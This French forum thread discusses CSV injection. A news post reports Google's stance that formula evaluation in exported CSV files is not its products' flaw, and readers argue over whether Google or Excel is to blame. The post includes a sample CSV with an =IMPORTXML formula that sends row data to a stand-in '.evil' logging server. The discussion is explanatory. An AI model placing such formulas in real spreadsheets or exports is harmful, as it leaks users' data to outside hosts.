IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Injection CSV : Google dédouane ses produits


Sujet :

Sécurité

  1. #1
    Chroniqueur Actualités
    Avatar de Patrick Ruiz
    Homme Profil pro
    Redacteur web
    Inscrit en
    Février 2017
    Messages
    2 201
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Redacteur web
    Secteur : Communication - Médias

    Informations forums :
    Inscription : Février 2017
    Messages : 2 201
    Par défaut Injection CSV : Google dédouane ses produits
    Injection CSV : Google dédouane ses produits
    mais que dire de ce rebondissement à propos du tableur Sheets ?

    Ne me la fais pas, lancera un utilisateur averti de technologies informatiques lorsqu’on essaie de lui parler des attaques par injection CSV. Les développements à ce sujet ont pris de la poussière. Sous certains cieux, on dit même : « les bords ont vieilli. » Le vecteur d’attaque est en effet crédité d’une entrée dans le top 10 de l’Open Web Application Security Project (OWASP) – un projet avec focus sur la sécurisation des applications Web – qui date de 2013. Le vecteur d’attaque est connu et semble-t-il, pris à la légère.

    Dans un billet de blog qui fait suite aux alertes de sécurité reçues de diverses équipes de recherche, Google répond : « nous recevons de temps à autre des rapports qui font une description des attaques par injection CSV. Ces derniers soulignent qu’un de nos produits, doté de la fonctionnalité d’exportation vers le format CSV peut être abusé par l’injection de formules Excel au sein d’un fichier à télécharger par un utilisateur. […]. Au-delà de la possibilité de réaliser des opérations arithmétiques sur la machine d’une victime, cet état de choses peut conduire à l’exécution de commandes arbitraires. »

    Et d’ajouter : « d’après notre équipe sécurité, il ne s’agit pas d’une situation dont la solution est de notre ressort ou qui pourrait avoir un impact sur la sécurité de nos utilisateurs et de nos produits. […]. Les fichiers CSV c’est du texte et l’évaluation des formules en leur sein est un comportement exhibé par un sous-ensemble d’applications qui les ouvrent. Il s’agit donc plus d’un effet secondaire de l’utilisation de ce format de fichiers qu’une faille dans nos produits capables d’exporter les fichiers CSV. Ce vecteur d’attaque peut être mitigé par l’application qui importe des données d’une source externe, comme Microsoft Excel par exemple, en générant un avertissement. Conclusion, nous ne pensons pas que le risque introduit par ce comportement nécessite que des changements soient apportés à nos produits. »

    Le coupable est, semble-t-il, très vite désigné, à savoir : les applications tierces et les développeurs en charge de mettre en place les protections nécessaires pour s’assurer d’une importation sans risque des fichiers CSV. Le bout de code CSV qui suit montre qu’un attaquant peut abuser de l’application Google Sheets elle-même en extirpant des données à un utilisateur même averti. Un appel à la fonction IMPORTXML (fonction de l’API Google Sheets que l’on retrouve aussi sur Excel) précédée de l’un des symboles qui déclenchent l’évaluation d’une formule (en l’occurrence ici =) et l’attaquant déclenche l’accès furtif à une ressource externe. « Google Sheets devrait au moins générer un avertissement lorsqu’une requête externe est générée lors de l’importation d’un fichier CSV », note l’auteur du billet de blog source.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
    2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240
    Il y a plus… le cas de l’utilisateur averti qui, dans une organisation bénéficie la plupart du temps des droits d’administrateur, est celui qui donne le plus froid dans le dos. Un appel bien placé de la fonction IMPORTRANGE dans un fichier CSV et l’attaquant peut avoir accès à des informations stockées au sein d’autres fichiers sur disque.

    La firme de Mountain View est au courant des vulnérabilités qu’exhibe son produit, mais ne semble pas changer d’avis sur la question. Les développeurs en charge de ces questions devront donc continuer à implémenter les protections nécessaires pour éviter que leurs organisations respectives puissent être pénétrées de la sorte. La littérature sur le sujet abonde sur la toile depuis un moment, 2013 selon des estimations. L’auteur du billet de blog pour sa part propose de faire précéder les symboles qui déclenchent l’évaluation des formules par le caractère de tabulation.

    Source : billet de blog, Google Bughunter University

    Et vous ?

    Que pensez-vous du positionnement de Google par rapport à ce vecteur d’attaques ?

    Comment en tant que développeur vous assurez-vous que l’importation de fichiers CSV ne pose pas de problème de sécurité ?

    Voir aussi :

    Des pirates se servent d'attaques par injection de SQL pour attaquer des sites conçus avec le CMS Drupal et y installer de faux ransomware
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  2. #2
    Invité
    Invité(e)
    Par défaut
    Citation Envoyé par Patrick Ruiz Voir le message
    Il y a plus … le cas de l’utilisateur averti qui, dans une organisation bénéficie la plupart du temps des droits d’administrateur, est celui qui donne le plus froid au dos. Un appel bien placé de la fonction IMPORTRANGE dans un fichier CSV et l’attaquant peut avoir accès à des informations stockées au sein d’autres fichiers sur disque.
    Je n'y connais rien en sécurité donc je me pose la question : un "utilisateur averti" fait du CSV ou du excel avec les droits d'administration ?

  3. #3
    Membre Expert
    Avatar de transgohan
    Homme Profil pro
    Développeur Temps réel Embarqué
    Inscrit en
    Janvier 2011
    Messages
    3 149
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Maine et Loire (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Temps réel Embarqué

    Informations forums :
    Inscription : Janvier 2011
    Messages : 3 149
    Par défaut
    Que pensez-vous du positionnement de Google par rapport à ce vecteur d’attaques ?
    Que pour une fois leur réponse est tout à fait cohérente et correcte et qu'on ne peut pas leur jeter la balle.

    Quand on ouvre un fichier texte au format csv le comportement voulu n'est pas d'exécuter du code ou des formules, il y a donc bien un problème dans l'éditeur qui ouvre le dit fichier.
    On va nous répondre que ce n'est pas un bug mais une fonctionnalité bientôt non ? Bah fonctionnalité aberrante au discrédit de la sécurité dans ce cas.

  4. #4
    Membre actif
    Profil pro
    Concepteur/Développeur
    Inscrit en
    Mai 2007
    Messages
    98
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Concepteur/Développeur

    Informations forums :
    Inscription : Mai 2007
    Messages : 98
    Par défaut
    Quand on ouvre un fichier texte au format csv le comportement voulu n'est pas d'exécuter du code ou des formules, il y a donc bien un problème dans l'éditeur qui ouvre le dit fichier.
    Donc Google a bien un problème dans son éditeur, on peut leur jeter la balle du coup

    ici les deux sont en tort : Google et Microsoft qui n'affichent aucun message d'information

  5. #5
    Membre éprouvé
    Profil pro
    Inscrit en
    Octobre 2005
    Messages
    959
    Détails du profil
    Informations personnelles :
    Âge : 45
    Localisation : France

    Informations forums :
    Inscription : Octobre 2005
    Messages : 959
    Par défaut
    Citation Envoyé par Dasoft Voir le message
    Donc Google a bien un problème dans son éditeur, on peut leur jeter la balle du coup
    L'éditeur en question est Excel, de Microsoft.

    Je suis d'accord avec Google sur ce coup. Ils n'ont pas à supprimer une fonctionnalité de leurs produits à cause d'un bogue d'Excel, c'est à Microsoft de régler le problème.

  6. #6
    Membre Expert
    Avatar de transgohan
    Homme Profil pro
    Développeur Temps réel Embarqué
    Inscrit en
    Janvier 2011
    Messages
    3 149
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Maine et Loire (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Temps réel Embarqué

    Informations forums :
    Inscription : Janvier 2011
    Messages : 3 149
    Par défaut
    Citation Envoyé par Dasoft Voir le message
    Donc Google a bien un problème dans son éditeur, on peut leur jeter la balle du coup
    Google ne fait que de l'export au format CSV d'après l'article. Et on leur reproche de ne pas filtrer les chaînes de texte qui sont exécutés ensuite par un logiciel tierce comme du code ou une formule.

  7. #7
    Membre très actif
    Homme Profil pro
    Développeur informatique
    Inscrit en
    Juillet 2007
    Messages
    891
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 43
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Juillet 2007
    Messages : 891
    Par défaut
    Mais c'est comme un navigateur, Excel devrait dire attention ou il va charger les données de tel site (Qui plus est pas en HTTPS) en demandant à l'utilisateur. Si Google changeait cela n'empêcherait pas n'importe quel hacker de faire un fichier verreux

Discussions similaires

  1. Google accentue la chasse aux bogues dans ses produits
    Par Cedric Chevalier dans le forum Sécurité
    Réponses: 3
    Dernier message: 14/08/2013, 17h04
  2. Réponses: 13
    Dernier message: 07/10/2012, 10h02
  3. Réponses: 0
    Dernier message: 18/11/2011, 17h06
  4. Réponses: 0
    Dernier message: 18/11/2011, 17h06
  5. Réponses: 0
    Dernier message: 14/10/2011, 13h16

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo